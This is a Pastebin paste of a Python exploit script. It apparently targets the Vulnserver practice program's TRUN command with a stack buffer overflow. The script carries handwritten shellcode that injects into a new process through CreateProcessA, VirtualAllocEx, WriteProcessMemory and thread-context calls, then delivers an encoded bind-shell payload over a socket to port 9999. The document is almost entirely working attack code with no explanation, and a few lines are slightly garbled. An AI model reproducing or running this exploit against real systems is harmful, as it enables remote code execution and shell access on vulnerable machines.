Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import socket
- import sys
- payload="\xBA\x73\x7D\x74\x10" #MOV EDX,10747d73
- payload+="\x81\xEA\x10\x10\x10\x10" #SUB EDX,10101010
- payload+="\x52" #PUSH EDX
- payload+="\x8B\xDC" #MOV EBX,ESP
- payload+="\x33\xC9"#XOR ECX,ECX
- payload+="\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51" #PUSH ECX
- payload+="\x8B\xF4"#MOV ESI,ESP
- payload+="\x8B\xFE"#MOV EDI,ESI
- payload+="\x83\xC7\x04" #MOV ADD EDI,4
- payload+="\x57" #PUSH EDI
- payload+="\x56" #PUSH ESI
- payload+="\x51\x51" #push ecx
- payload+="\xB9\x05\x01\x01\x09" #mov ecx,9010105
- payload+="\x81\xE9\x01\x01\x01\x01" #sub ecx,1010101
- payload+="\x51" #PUSH ecx
- payload+="\x33\xC9" #XOR ECX,ECX
- payload+="\x51" #PUSH ecx
- payload+="\x51" #PUSH ecx
- payload+="\x51" #PUSH ecx
- #payload+="\x51" #PUSH ecx
- payload+="\x53" #PUSH ebx
- payload+="\x51" #PUSH ecx
- payload+="\xBB\x82\x20\xDE\x77" #MOV EBX,CreateProcessA
- payload+="\xff\xd3" #Call EBX
- payload+="\x5E" #pop esi
- payload+="\x5E" #pop esi store
- payload+="\x5f" #pop edi
- payload+="\x6A\x40" #PUSH 40 flprotect PAGE_EXECUTE_READWRITE
- payload+="\x33\xC9" #XOR ECX,ECX
- payload+="\xb5\x30" #MOV CH,30
- payload+="\x51" #PUSH ECX flAllocationType
- payload+="\xb5\x01" #MOV CH,01
- payload+="\xb1\xf4" #MOV CL,0F4
- payload+="\x51" #PUSH ECX
- payload+="\x33\xC9" #XOR ECX,ECX
- payload+="\x51" #PUSH ECX
- payload+="\x56" #PUSH ESI
- payload+="\xBB\xB6\xc1\xe1\x77"#MOV EBX,kernel32.VirtualallocEx payload+="\xBB\xB6\xc1\xe1\x77″
- payload+="\xff\xd3" #Call EBX
- payload+="\x8B\xE8" #MOV EBP,EAX
- payload+="\x33\xdb" #XOR EBX,EBX
- payload+="\x53"#PUSH EBX
- payload+="\xb7\x01"#MOV BH,1
- payload+="\xb3\xf4"#MOV bl,0f4
- payload+="\x53" #PUSH EBX
- payload+="\x8b\xdc"#mov EBX,ESP
- payload+="\x66\x81\xC3\x74\x02" #ADD BX,274
- payload+="\x53" #PUSH EBX
- payload+="\x50" #PUSH EAX
- payload+="\x56" #PUSH ESI
- payload+="\xBB\xde\xC1\xe1\x77" #MOV EBX,kernel32.writeProcessMEMORY
- payload+="\xff\xd3" #Call EBX
- payload+="\x8b\xdc"#MOV EBX,ESP
- payload+="\x66\x81\xEB\x50\x01" #SUB BX,150
- payload+="\x33\xc9" #XOR ECX,ECX
- payload+="\x66\xB9\xff\xff"#MOV CX,0xffff
- payload+="\x41" #inc ecx
- payload+="\x41" #inc ecx
- payload+="\x89\x0B"#MOV DWORD[EBX],ECX
- payload+="\x53"#PUSH ECX
- payload+="\x57"#PUSH EDI
- payload+="\xB9\xC1\x0C\xE4\x77"#MOV ECX,kernel32.GetThreadContext
- payload+="\xff\xd1" #Call ECX
- payload+="\x8b\xcb"#MOV ECX,EbX
- payload+="\x80\xc1\xb8" #ADD CL,0xb8
- payload+="\x80\xc5\x01" #ADD CH,0x1
- payload+="\x89\x29" #MOV DWORD [ECX],EBP
- payload+="\x53" #PUSH EDX
- payload+="\x57" #PUSH EDI
- payload+="\xbb\x93\x01\xe7\x77" #mov ebx,kernel32.SetThreadContext
- payload+="\xff\xd3" #Call EBX
- payload+="\x57" #PUSH EDI
- payload+="\xbb\x1c\x0f\xe2\x77"#MOV EBX,kernel32.ResumeThread
- payload+="\xff\xd3" #Call EBX
- payload+="\x33\xc9" #XOR ECX,ECX
- payload+="\x51" #PUSH ECX
- payload+="\xBB\x4f\x21\xe3\x77" #mov ebx,kernel32.ExitProcess
- payload+="\xff\xd3" #Call EBX
- sleep=""
- sleep+="\x33\xc9" #XOR ECX,ECX
- sleep+="\xB1\x88" #MOV CL,88
- sleep+="\xB5\x13" #MOV CH,13
- sleep+="\x51" #PUSH ECX
- sleep+="\xbb\x46\xba\xe2\x77" #MOV EBX,kernel32.Sleep
- sleep+="\xff\xd3" #Call EBX
- bind_shell=("\xda\xc2\xd9\x74\x24\xf4\xbd\x90\xac\x38\xd9\x58\x29\xc9\xb1"
- "\x53\x31\x68\x17\x83\xc0\x04\x03\xf8\xbf\xda\x2c\x04\x57\x98"
- "\xcf\xf4\xa8\xfd\x46\x11\x99\x3d\x3c\x52\x8a\x8d\x36\x36\x27"
- "\x65\x1a\xa2\xbc\x0b\xb3\xc5\x75\xa1\xe5\xe8\x86\x9a\xd6\x6b"
- "\x05\xe1\x0a\x4b\x34\x2a\x5f\x8a\x71\x57\x92\xde\x2a\x13\x01"
- "\xce\x5f\x69\x9a\x65\x13\x7f\x9a\x9a\xe4\x7e\x8b\x0d\x7e\xd9"
- "\x0b\xac\x53\x51\x02\xb6\xb0\x5c\xdc\x4d\x02\x2a\xdf\x87\x5a"
- "\xd3\x4c\xe6\x52\x26\x8c\x2f\x54\xd9\xfb\x59\xa6\x64\xfc\x9e"
- "\xd4\xb2\x89\x04\x7e\x30\x29\xe0\x7e\x95\xac\x63\x8c\x52\xba"
- "\x2b\x91\x65\x6f\x40\xad\xee\x8e\x86\x27\xb4\xb4\x02\x63\x6e"
- "\xd4\x13\xc9\xc1\xe9\x43\xb2\xbe\x4f\x08\x5f\xaa\xfd\x53\x08"
- "\x1f\xcc\x6b\xc8\x37\x47\x18\xfa\x98\xf3\xb6\xb6\x51\xda\x41"
- "\xb8\x4b\x9a\xdd\x47\x74\xdb\xf4\x83\x20\x8b\x6e\x25\x49\x40"
- "\x6e\xca\x9c\xfd\x66\x6d\x4f\xe0\x8b\xcd\x3f\xa4\x23\xa6\x55"
- "\x2b\x1c\xd6\x55\xe1\x35\x7f\xa8\x0a\x1e\x8f\x25\xec\x0a\x9f"
- "\x63\xa6\xa2\x5d\x50\x7f\x55\x9d\xb2\xd7\xf1\xd6\xd4\xe0\xfe"
- "\xe6\xf2\x46\x68\x6d\x11\x53\x89\x72\x3c\xf3\xde\xe5\xca\x92"
- "\xad\x94\xcb\xbe\x45\x34\x59\x25\x95\x33\x42\xf2\xc2\x14\xb4"
- "\x0b\x86\x88\xef\xa5\xb4\x50\x69\x8d\x7c\x8f\x4a\x10\x7d\x42"
- "\xf6\x36\x6d\x9a\xf7\x72\xd9\x72\xae\x2c\xb7\x34\x18\x9f\x61"
- "\xef\xf7\x49\xe5\x76\x34\x4a\x73\x77\x11\x3c\x9b\xc6\xcc\x79"
- "\xa4\xe7\x98\x8d\xdd\x15\x39\x71\x34\x9e\x49\x38\x14\xb7\xc1"
- "\xe5\xcd\x85\x8f\x15\x38\xc9\xa9\x95\xc8\xb2\x4d\x85\xb9\xb7"
- "\x0a\x01\x52\xca\x03\xe4\x54\x79\x23\x2d")
- shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + payload + "C"*(2500-len(payload)-4-2003-10)+"\x90"*100+sleep+"\x90"*10+bind_shell #625011af
- try:
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connect=s.connect((‘172.16.12.204’,9999))
- s.send((‘TRUN /.:/’+shellcode))
- print("Fuzzing with TRUN comamnd with %s bytes"% str(len(shellcode)))
- s.close()
- except:
- print("Error connecting to server")
- sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement